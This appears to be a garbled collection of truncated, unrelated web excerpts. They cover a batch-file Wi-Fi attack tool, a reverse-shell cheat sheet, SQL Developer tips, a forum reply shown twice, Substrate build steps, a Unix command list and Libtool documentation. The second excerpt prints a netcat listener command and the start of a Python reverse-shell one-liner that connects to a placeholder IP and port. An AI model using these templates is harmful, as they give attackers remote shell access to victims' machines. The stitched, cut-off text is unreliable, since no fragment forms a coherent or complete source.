An active attack tool against Wi-Fi networks with internal CMD commands. This program is created to be a proof of concept that it is possible to write a working Wi-Fi attack tool with Batchfiles since there are countless examples on the internet that claims to be legit hacking tools, worki...
Only works in cmd.exeListen for reverse shellnc -lnvp <port> Reverse templates for basically everything you might need python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os...
ctrl or cmd+shift+p, OR right-click in an editor Search on ‘sql dev’ to find all the extension commands you can invoke from the keyboard, or search on ‘color’ to do fun things like change the theme. Zoom In and Out You might be used to this from your terminal/cmd windows, b...
(I’m a bit late on this one – it has been out for a few days) This release has built into a very large release due to much going on in the lives of those involved. It includes some major changes (hopefully none that break too much) so please release to your production servers ...
thank you for your answer. I have posted only a partial part of the configuration file, and these commands is already entered on router. But the problem persists. Thank you anyway! 0 Helpful Reply paolo bevilacqua Hall of Fame In response to nicoladazzi ...
thank you for your answer. I have posted only a partial part of the configuration file, and these commands is already entered on router. But the problem persists. Thank you anyway! 0 Helpful Reply paolo bevilacqua Hall of Fame In response to nicoladazzi 07-11-2...
6.1. Hacking on Substrate If you’d actually like to hack on Substrate, you can just grab the source code and build it. Ensure you have Rust and the support software installed: 6.1.1. Linux and Mac For Unix-based operating systems, you should run the following commands: ...
until Execute commands (until error) uuencode Encode a binary file uudecode Decode a file created by uuencode uuidgen Generate a Unique ID (UUID/GUID) uucp Unix to Unix copy vi Text Editor w Show who is logged on and what they are doing wait Wait for a process to complete • wall Wri...
A hacking adventure... 🧝💻🔓 Disclaimer This information is provided for educational purposes only, I'm not responsible if you break, or brick your equipment following some instructions provided herein (seeLicense). It is very likely that you will do so, and at the very least you shoul...
To use Libtool, add the new generic library building commands to yourMakefile,, See the documentation for details. Reporting Bugs === If this distribution doesn't work for you, before you report the problem, at least try upgrading to the latest released version ...